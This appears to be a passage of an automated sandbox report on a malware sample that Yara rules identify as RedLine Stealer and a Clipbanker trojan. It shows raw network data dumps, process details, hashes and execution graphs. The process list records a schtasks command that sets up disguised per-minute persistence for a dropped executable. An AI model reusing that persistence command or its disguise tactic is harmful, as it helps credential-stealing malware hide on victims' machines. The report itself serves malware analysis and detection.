                                                                                                                                                  2022-11-15 17:54:38 UTC5295INData Raw: 51 89 5b f5 95 f3 12 56 8c 0e 8c 13 03 e0 47 ba cf 98 22 46 ea 06 65 fb 0b f7 20 ae d4 f2 54 53 01 5a 5b b8 21 a9 67 e7 69 78 f1 99 69 f7 17 5d 18 b9 a3 68 f4 f2 59 69 79 57 b6 4b d7 7d bd df 96 b3 69 89 50 d6 ee 05 c7 99 2d ae e6 73 47 18 25 53 d7 9d 2d 21 fe 2e c3 a1 81 cb d7 b4 89 7d 73 34 c9 72 bd c4 30 81 cb b2 74 2b dc d0 58 5f 53 b2 36 b4 a2 c1 c6 e9 b1 9f 97 fe 6b de 9b 1d 0c 58 c3 0a 7d 04 e6 b0 38 3a 57 80 d7 3f 04 b7 b8 a8 00 92 32 44 76 3b fb 7a aa 07 1c 5e c9 62 8b e0 ce 4d 43 ea 00 47 fd e3 64 90 22 1c a9 00 1a 33 c1 29 f2 1e f1 4c 3d e5 d3 00 41 c8 2a 50 e9 be a5 01 c4 40 95 e0 9a 6b 86 ec 66 ad 03 9e 14 fc 01 c5 e5 c8 2c 5c 2e 98 dc 00 94 41 33 b1 49 1c 9a ce 00 2d f0 a4 aa 9b 72 e2 87 18 45 29 0f 5e c3 b9 00 dd 28 85 05 2c 48 e7 07 3b 57
                                                                                                                                                  Data Ascii: Q[VG"Fe TSZ[!gixi]hYiyWK}iP-sG%S-!.}s4r0t+X_S6kX}8:W?2Dv;z^bMCGd"3)L=A*P@kf,\.A3I-rE)^(,H;W
                                                                                                                                                  2022-11-15 17:54:38 UTC5311INData Raw: ef 00 15 34 d3 a6 04 8f e2 b3 4a 79 80 ba c6 1d 61 07 3e a7 54 15 18 30 2b 5b 21 65 00 d0 f0 88 5e bb 1a 1f 69 00 0b 96 6d c6 ce 19 98 38 00 cb b6 3c 33 86 99 8e f9 00 43 ba cd 0f 9e c4 f6 15 00 d3 4e af 8c 20 fa cb ad 04 db 0c 59 ea 6a 81 d1 3e f6 cc 9e d8 00 b7 30 9b 8d 0e 62 d4 8b 00 66 73 7c ef c4 bc ca 88 00 48 f6 3c 71 bd 2e 3b 2f 3f e6 12 80 fe f1 e2 21 34 7f 66 00 6c ab aa d0 7a 42 f9 5b 1f af 79 24 47 fe d1 7d a0 56 6a e8 30 39 c3 2d 80 3f c1 f1 63 b1 29 d5 00 f8 10 31 de bb 7c c2 25 07 ae f7 08 f3 b8 90 16 b5 88 d2 01 cc 03 67 79 5b 2f c1 fc 3d 9b 00 4f 75 91 3f 88 b5 29 0b 00 db da cd 12 2b 1f 44 e2 00 15 28 c3 30 37 c0 eb 57 00 98 41 18 48 55 10 cd b5 00 f2 c5 8c ac 74 0a 96 f0 00 d0 35 86 6d 47 af e5 a3 00 17 d8 73 93 45 bd 09 b6 00 72 77 ed
                                                                                                                                                  Data Ascii: 4Jya>T0+[!e^im8<3CN Yj>0bfs|H<q.;/?!4flzB[y$G}Vj09-?c)1|%gy[/=Ou?)+D(07WAHUt5mGsErw
                                                                                                                                                  2022-11-15 17:54:38 UTC5327INData Raw: 48 aa fd e8 ca 1f 28 45 9a 00 a3 e1 96 92 49 e9 72 e0 99 26 50 87 6c b5 de 22 dc 20 ee f5 2f aa 3d 5c 59 d8 63 74 84 5a a7 c3 b2 2c 5e 15 ee 21 49 fd 46 8c 30 a2 ad 24 f9 9d 7c 37 80 14 d6 8e 2a 83 cb 0f ea f7 21 ef e0 61 24 9c fc a5 3c b2 73 1c 62 68 80 77 02 9e 80 40 26 00 0f 1f fa 45 60 96 30 f4 00 5d 38 ab 76 a5 63 5c c0 00 e6 17 c3 1c f7 f8 5e 91 74 d5 02 07 59 b3 73 15 ce 40 44 1d 94 c0 90 32 7e e7 4c f6 04 4e 67 75 64 a2 a8 f6 7b c0 28 0f 9d 9e 98 df 38 4e 21 2c f3 72 82 d4 33 09 79 61 35 de 78 66 14 63 2c 9e 04 0d e8 e3 bd ed 1e 2e 6f fd 82 44 bc 07 1b 7e 2a af df 90 e5 05 e6 c7 44 7b 09 4b 77 66 cb 29 dd d0 bc 00 86 90 2c 56 b7 f6 c1 54 a2 e9 d9 c6 60 50 ca 02 07 3a 1e 2d 61 2f 48 bb 1a 99 5c 22 44 1f 8e 5c 30 34 14 a8 ed 01 5d f4 d6 cc 17 dd da
                                                                                                                                                  Data Ascii: H(EIr&Pl" /=\YctZ,^!IF0$|7*!a$<sbhw@&E`0]8vc\^tYs@D2~LNgud{(8N!,r3ya5xfc,.oD~*D{Kwf),VT`P:-a/H\"D\04]
                                                                                                                                                  2022-11-15 17:54:38 UTC5343INData Raw: 0b e4 75 e9 a2 c0 eb df d0 00 d3 f0 6c a8 ab 84 78 4e 00 7b 85 b9 e1 49 1e 51 8a 1e f1 73 09 00 ed aa da c1 05 36 0c 5a e2 be 1b ec e5 fc 63 00 50 49 c7 9f 20 2e 42 0b 00 8a 38 10 92 54 cd 56 35 00 f5 75 19 d6 3c fd e0 49 3f 0c e7 00 9c 66 a2 69 4d 10 0f 00 20 75 6c 4b f4 87 18 de 00 60 54 40 92 53 e5 64 7e 0b 16 ad b0 52 76 15 5c 12 e9 d5 09 a9 51 b9 0a be 86 fc 65 5a c5 28 e7 cf 3e dc 10 8b 07 84 5f 20 fb 8b 81 5b cc af 32 bd e2 af de af 62 4a 44 75 74 74 d0 51 c1 9f dc 6c 72 de 8c 27 4c 89 30 e6 01 30 7f 85 57 00 f6 71 d1 ca 83 14 fa e4 c0 1d 4b d4 d2 0c 19 18 fd 6b 53 44 91 db 7f be 98 38 18 e8 36 6c 19 7d b5 26 07 ef 38 00 df 5e b1 3c f2 16 00 18 4b 5d a8 8c 87 10 02 0c 7c dd 65 b3 78 b9 00 42 7a 4a 35 84 c7 55 da 00 16 6c 9f 8d 17 67 b1 40 00 4d 83
                                                                                                                                                  Data Ascii: ulxN{IQs6ZcPI .B8TV5u<I?fiM ulK`T@Sd~Rv\QeZ(>_ [2bJDuttQlr'L00WqKkSD86l}&8^<K]|exBzJ5Ulg@M
                                                                                                                                                  2022-11-15 17:54:38 UTC5359INData Raw: ab df 2d 6f 1a 54 51 6c 33 b3 8d 59 60 e7 df e8 17 22 a3 79 41 62 cf fc 7b f3 92 da ae e0 3c 4f 0f 5a cc 6e df 1f bc 22 af b7 38 10 9a 34 a7 0b ff fe 1d 5e a4 f3 ee 16 38 2b 3f ac 76 94 41 9d 64 1d fa 80 fd 00 e1 fe f8 3a d4 c3 5e bb 69 4d 72 99 e5 f1 32 2d 51 fa 61 ad 4d ea 26 8e 6d fc a9 48 98 3e f2 46 0d 69 b1 b7 6e f4 05 db 41 05 c6 18 c0 50 e4 f8 ad fe ac 63 61 47 91 bc 46 b5 46 53 6c c5 f4 e1 86 27 93 84 39 6c 75 e0 1d 0c 7a 59 8b 2e cb f4 64 2c 42 47 f4 54 58 85 37 e5 c7 69 a7 d2 25 8b 96 bf c6 ad e0 bd b1 37 f7 1f df 42 7b aa eb 1c e9 eb 3d 5a dd f8 d2 90 d5 49 9a 3a 1d 83 1a 57 7f 1c 01 c2 ce 1c 7d cc fb 96 15 c5 02 03 01 00 01 a3 82 01 82 30 82 01 7e 30 1f 06 03 55 1d 23 04 18 30 16 80 14 1a a1 f8 61 19 20 0f c3 41 77 45 28 8e d1 35 5f 06 12 04
                                                                                                                                                  Data Ascii: -oTQl3Y`"yAb{<OZn"84^8+?vAd:^iMr2-QaM&mH>FinAPcaGFFSl'9luzY.d,BGTX7i%7B{=ZI:W}0~0U#0a AwE(5_


                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:18:53:54
                                                                                                                                                  Start date:15/11/2022
                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                  Imagebase:0xe20000
                                                                                                                                                  File size:140288 bytes
                                                                                                                                                  MD5 hash:D8FA5EC2E689DFBC2559EF3A5CB69CA2
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.309008027.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low

                                                                                                                                                  Target ID:1
                                                                                                                                                  Start time:18:54:39
                                                                                                                                                  Start date:15/11/2022
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Setup.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Setup.exe"
                                                                                                                                                  Imagebase:0x13e0000
                                                                                                                                                  File size:5490488 bytes
                                                                                                                                                  MD5 hash:BCBB46256A4AF7B5509B2924BE449BC3
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000001.00000003.426846132.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000001.00000002.440712189.00000000013E1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 62%, ReversingLabs
                                                                                                                                                  Reputation:low

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:18:54:54
                                                                                                                                                  Start date:15/11/2022
                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                                                                                                                                                  Imagebase:0x290000
                                                                                                                                                  File size:185856 bytes
                                                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:18:54:54
                                                                                                                                                  Start date:15/11/2022
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7fcd70000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:18:54:55
                                                                                                                                                  Start date:15/11/2022
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                                                                                                                  Imagebase:0x200000
                                                                                                                                                  File size:5490488 bytes
                                                                                                                                                  MD5 hash:BCBB46256A4AF7B5509B2924BE449BC3
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000006.00000002.575451652.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                  • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000006.00000003.468605654.0000000001270000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 62%, ReversingLabs
                                                                                                                                                  Reputation:low

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:18:55:14
                                                                                                                                                  Start date:15/11/2022
                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                                                                                                                                                  Imagebase:0x7ff6ffff0000
                                                                                                                                                  File size:185856 bytes
                                                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:18:55:14
                                                                                                                                                  Start date:15/11/2022
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7fcd70000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:12.7%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:2.4%
                                                                                                                                                    Total number of Nodes:127
                                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                                    execution_graph 14686 18b0448 14687 18b0458 14686->14687 14690 18b08f8 14687->14690 14691 18b092b 14690->14691 14692 18b0c5e 14691->14692 14695 18b1839 14691->14695 14699 18b1848 14691->14699 14696 18b1848 14695->14696 14698 18b1881 14696->14698 14703 18b28c9 14696->14703 14698->14691 14700 18b1868 14699->14700 14701 18b1881 14700->14701 14702 18b28c9 2 API calls 14700->14702 14701->14691 14702->14701 14704 18b28d0 14703->14704 14708 18b86b0 14704->14708 14713 18b86c0 14704->14713 14705 18b29bc 14705->14698 14709 18b86b8 14708->14709 14710 18b8688 14709->14710 14718 18bcf20 14709->14718 14724 18bcf30 14709->14724 14710->14705 14710->14710 14714 18b86c1 14713->14714 14715 18b87a6 14714->14715 14716 18bcf20 2 API calls 14714->14716 14717 18bcf30 2 API calls 14714->14717 14716->14715 14717->14715 14719 18bcf30 14718->14719 14730 18bd7a0 14719->14730 14735 18bd767 14719->14735 14740 18bd7b0 14719->14740 14720 18bcf43 14720->14710 14725 18bcf35 14724->14725 14727 18bd7a0 2 API calls 14725->14727 14728 18bd7b0 2 API calls 14725->14728 14729 18bd767 2 API calls 14725->14729 14726 18bcf43 14726->14710 14727->14726 14728->14726 14729->14726 14731 18bd7a4 14730->14731 14732 18bd7ec 14731->14732 14745 18be068 14731->14745 14752 18be0d0 14731->14752 14732->14720 14736 18bd789 14735->14736 14737 18bd7ec 14736->14737 14738 18be068 2 API calls 14736->14738 14739 18be0d0 2 API calls 14736->14739 14737->14720 14738->14737 14739->14737 14741 18bd7b1 14740->14741 14742 18bd7ec 14741->14742 14743 18be068 2 API calls 14741->14743 14744 18be0d0 2 API calls 14741->14744 14742->14720 14743->14742 14744->14742 14746 18be06d 14745->14746 14747 18be0fe 14746->14747 14759 18bee33 14746->14759 14778 18bf1b0 14746->14778 14783 18bee40 14746->14783 14802 18bf201 14746->14802 14747->14732 14753 18be0d1 14752->14753 14754 18be0fe 14753->14754 14755 18bee33 2 API calls 14753->14755 14756 18bf201 2 API calls 14753->14756 14757 18bee40 2 API calls 14753->14757 14758 18bf1b0 2 API calls 14753->14758 14754->14732 14755->14754 14756->14754 14757->14754 14758->14754 14760 18bee3d 14759->14760 14769 18bee33 2 API calls 14760->14769 14770 18bf201 2 API calls 14760->14770 14771 18bee40 2 API calls 14760->14771 14816 18bf29f 14760->14816 14761 18bee83 14762 18bef8f 14761->14762 14765 18bf29e 14761->14765 14767 18befb0 14761->14767 14763 18be0d0 2 API calls 14762->14763 14763->14767 14764 18bf24d 14764->14747 14766 18bf2fc 14765->14766 14772 18bf29f 2 API calls 14765->14772 14773 18bee33 2 API calls 14765->14773 14774 18bf201 2 API calls 14765->14774 14775 18bee40 2 API calls 14765->14775 14766->14747 14824 18bfb23 14767->14824 14829 18bfb30 14767->14829 14769->14761 14770->14761 14771->14761 14772->14766 14773->14766 14774->14766 14775->14766 14780 18befd3 14778->14780 14779 18bf24d 14779->14747 14781 18bfb23 KiUserCallbackDispatcher 14780->14781 14782 18bfb30 KiUserCallbackDispatcher 14780->14782 14781->14779 14782->14779 14784 18bee68 14783->14784 14792 18bf29f 2 API calls 14784->14792 14793 18bee33 2 API calls 14784->14793 14794 18bf201 2 API calls 14784->14794 14795 18bee40 2 API calls 14784->14795 14785 18bee83 14786 18bef8f 14785->14786 14789 18bf29e 14785->14789 14791 18befb0 14785->14791 14787 18be0d0 2 API calls 14786->14787 14787->14791 14788 18bf24d 14788->14747 14790 18bf2fc 14789->14790 14796 18bf29f 2 API calls 14789->14796 14797 18bee33 2 API calls 14789->14797 14798 18bf201 2 API calls 14789->14798 14799 18bee40 2 API calls 14789->14799 14790->14747 14800 18bfb23 KiUserCallbackDispatcher 14791->14800 14801 18bfb30 KiUserCallbackDispatcher 14791->14801 14792->14785 14793->14785 14794->14785 14795->14785 14796->14790 14797->14790 14798->14790 14799->14790 14800->14788 14801->14788 14803 18bef65 14802->14803 14804 18bef8f 14803->14804 14807 18bf29e 14803->14807 14809 18befb0 14803->14809 14805 18be0d0 2 API calls 14804->14805 14805->14809 14806 18bf24d 14806->14747 14808 18bf2fc 14807->14808 14810 18bf29f 2 API calls 14807->14810 14811 18bee33 2 API calls 14807->14811 14812 18bf201 2 API calls 14807->14812 14813 18bee40 2 API calls 14807->14813 14808->14747 14814 18bfb23 KiUserCallbackDispatcher 14809->14814 14815 18bfb30 KiUserCallbackDispatcher 14809->14815 14810->14808 14811->14808 14812->14808 14813->14808 14814->14806 14815->14806 14817 18bf2b3 14816->14817 14819 18bf331 14816->14819 14818 18bf2fc 14817->14818 14820 18bf29f 2 API calls 14817->14820 14821 18bee33 2 API calls 14817->14821 14822 18bf201 2 API calls 14817->14822 14823 18bee40 2 API calls 14817->14823 14818->14761 14819->14761 14820->14818 14821->14818 14822->14818 14823->14818 14826 18bfb3f 14824->14826 14825 18bfb53 14825->14764 14826->14825 14827 18bfe31 KiUserCallbackDispatcher 14826->14827 14828 18bfe5e 14827->14828 14828->14764 14831 18bfb3b 14829->14831 14830 18bfb53 14830->14764 14831->14830 14832 18bfe31 KiUserCallbackDispatcher 14831->14832 14833 18bfe5e 14832->14833 14833->14764

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1224 18b08f8-18b0929 1225 18b092b 1224->1225 1226 18b0930-18b09f3 1224->1226 1225->1226 1228 18b09ff-18b0a33 1226->1228 1229 18b09f5-18b09fe 1226->1229 1233 18b0a39-18b0a6f 1228->1233 1234 18b0add-18b0b0c 1228->1234 1229->1228 1237 18b0ac1-18b0adc 1233->1237 1238 18b0a71-18b0abb 1233->1238 1241 18b0c41-18b0c58 1234->1241 1237->1234 1238->1237 1243 18b0c5e-18b0c84 1241->1243 1244 18b0b11-18b0b7e 1241->1244 1251 18b0cea-18b0d1b 1243->1251 1257 18b0b80 1244->1257 1258 18b0b85-18b0bb9 1244->1258 1254 18b0d21-18b0dd1 1251->1254 1255 18b0c86-18b0cb5 1251->1255 1280 18b0de0-18b0e1b 1254->1280 1262 18b0cde-18b0ce9 1255->1262 1263 18b0cb7-18b0cd3 1255->1263 1257->1258 1264 18b0c24-18b0c33 1258->1264 1262->1251 1263->1262 1268 18b0bbb-18b0bca 1264->1268 1269 18b0c35 1264->1269 1270 18b0bcc 1268->1270 1271 18b0bd1-18b0be8 1268->1271 1274 18b0c3f-18b0c40 1269->1274 1270->1271 1323 18b0bea call 18b1839 1271->1323 1324 18b0bea call 18b1848 1271->1324 1274->1241 1275 18b0bf0-18b0c0a 1277 18b0c1d-18b0c1e 1275->1277 1278 18b0c0c-18b0c1b 1275->1278 1277->1264 1278->1269 1282 18b0e1d-18b0eae 1280->1282 1283 18b0dd3-18b0ddf 1280->1283 1292 18b0f14-18b0f7a 1282->1292 1283->1280 1294 18b0eb0-18b0edf 1292->1294 1295 18b0f80-18b1008 1292->1295 1298 18b0f08-18b0f13 1294->1298 1299 18b0ee1-18b0efd 1294->1299 1306 18b10ff-18b1117 1295->1306 1298->1292 1299->1298 1308 18b100d-18b102c 1306->1308 1309 18b111d-18b113f 1306->1309 1312 18b1092-18b10d0 1308->1312 1314 18b10d8-18b10f8 1312->1314 1315 18b102e-18b105d 1314->1315 1316 18b10fe 1314->1316 1318 18b105f-18b107b 1315->1318 1319 18b1086-18b1091 1315->1319 1316->1306 1318->1319 1319->1312 1323->1275 1324->1275
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.413488179.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_18b0000_file.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 23556c68f7129d008b09a9dbf92a93fbcacea4a16810e2b8945cb7f3a4e02507
                                                                                                                                                    • Instruction ID: 25cdb0e821e9dd27cdbc6b9100584bf4c83f81c88a1b8b53bb10eac8d5e27b33
                                                                                                                                                    • Opcode Fuzzy Hash: 23556c68f7129d008b09a9dbf92a93fbcacea4a16810e2b8945cb7f3a4e02507
                                                                                                                                                    • Instruction Fuzzy Hash: 4232F174901228CFDB65DF64C994BEABBB2FF4A305F4081E9D509AB260DB359B84CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 834 18bfb30-18bfb39 835 18bfb3b-18bfb3d 834->835 836 18bfb4a 834->836 835->836 837 18bfb3f-18bfb48 835->837 838 18bfb4f-18bfb51 836->838 837->838 839 18bfb5a-18bfb64 838->839 840 18bfb53-18bfb59 838->840 841 18bfb6f-18bfbba 839->841 842 18bfb66-18bfb6c 839->842 849 18bfbbc-18bfbc0 841->849 850 18bfbc1-18bfbc2 841->850 842->841 849->850 851 18bfbc9-18bfbda 850->851 852 18bfbc4-18bfbc5 850->852 853 18bfbdc-18bfbde 851->853 854 18bfbe0 851->854 852->851 855 18bfbe5-18bfbf7 853->855 854->855 857 18bfc8d-18bfc96 855->857 858 18bfbfd-18bfc19 855->858 859 18bfc98-18bfc9e 857->859 860 18bfca0-18bfd28 857->860 862 18bfc1b 858->862 863 18bfc83-18bfc8a 858->863 859->860 879 18bfd2f-18bfd38 860->879 866 18bfc1e-18bfc2f 862->866 869 18bfc31-18bfc4a call 18be700 866->869 870 18bfc50-18bfc65 866->870 869->870 869->879 878 18bfc6d-18bfc6f 870->878 880 18bfc7d-18bfc81 878->880 881 18bfc71-18bfc76 878->881 883 18bfd3a-18bfd40 879->883 884 18bfd42-18bfe5c KiUserCallbackDispatcher 879->884 880->863 880->866 881->880 883->884 903 18bfe5e-18bfe64 884->903 904 18bfe65-18bfe79 884->904 903->904
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.413488179.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_18b0000_file.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4f94e0f78e81d066f5d3fa115f9bf2d421320655e7e915eacf0795e1208d5b88
                                                                                                                                                    • Instruction ID: 93fec151f984adf97a320807e5bcc5164f05abaa6a214cfce85d53bebdb49e0c
                                                                                                                                                    • Opcode Fuzzy Hash: 4f94e0f78e81d066f5d3fa115f9bf2d421320655e7e915eacf0795e1208d5b88
                                                                                                                                                    • Instruction Fuzzy Hash: 17A19D74B002058FDB14DF68D8A5AAEBBF6EF89304F108469EA06DB391DB34DD45CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1062 18bfdea-18bfe29 1063 18bfe31-18bfe5c KiUserCallbackDispatcher 1062->1063 1064 18bfe5e-18bfe64 1063->1064 1065 18bfe65-18bfe79 1063->1065 1064->1065
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL ref: 018BFE4F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.413488179.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_18b0000_file.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: 5a293b166fa4c95096e642ded008cbd107e55cc03348b50258f4b7381944c699
                                                                                                                                                    • Instruction ID: 13de9dce4bcd346b12e619ac8c4964247cccaf73238bc4ce1ddafd9df7b9d482
                                                                                                                                                    • Opcode Fuzzy Hash: 5a293b166fa4c95096e642ded008cbd107e55cc03348b50258f4b7381944c699
                                                                                                                                                    • Instruction Fuzzy Hash: 061115B19002498FCB10CF99D985BDEFBF4EB48724F148419D529A7740C378A948CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.412921043.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_184d000_file.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4f184096bdbc9b0e2e2a0ee78b327addd74f1fa7106d6074ae7e6fac69e66545
                                                                                                                                                    • Instruction ID: 35a813f187dc814506060d6a94bb570ea1eb4e3c2dd1ac7f6a8f48fe51e90256
                                                                                                                                                    • Opcode Fuzzy Hash: 4f184096bdbc9b0e2e2a0ee78b327addd74f1fa7106d6074ae7e6fac69e66545
                                                                                                                                                    • Instruction Fuzzy Hash: B5216B71500248DFDF05CF94D8C0B26BB61FB98318F248A69E9084B306C73AD556CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.412921043.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_184d000_file.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8401a173d32fc1ddfab3fbcef795dab8ecbd37fce7f15f642f99d1a31a5ed861
                                                                                                                                                    • Instruction ID: 186b7e5c2d1fbea7477f3423b6534a9ff3f2db4b0420d88a89ab2dda54ede9d7
                                                                                                                                                    • Opcode Fuzzy Hash: 8401a173d32fc1ddfab3fbcef795dab8ecbd37fce7f15f642f99d1a31a5ed861
                                                                                                                                                    • Instruction Fuzzy Hash: 6D210671600248DFDB05CF94D9C0B16BB65FB9832CF248669E8098B706CB36D95ACBE1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.412921043.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_184d000_file.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6d0f2ad02ec950388d8ff7bcc5b891017d3c77a8c83b1ea61ec5581c82a953f5
                                                                                                                                                    • Instruction ID: 547a1add2fbb044be18e4e8a9533a2e14817f450cd695e8062003bc6efdd7fa7
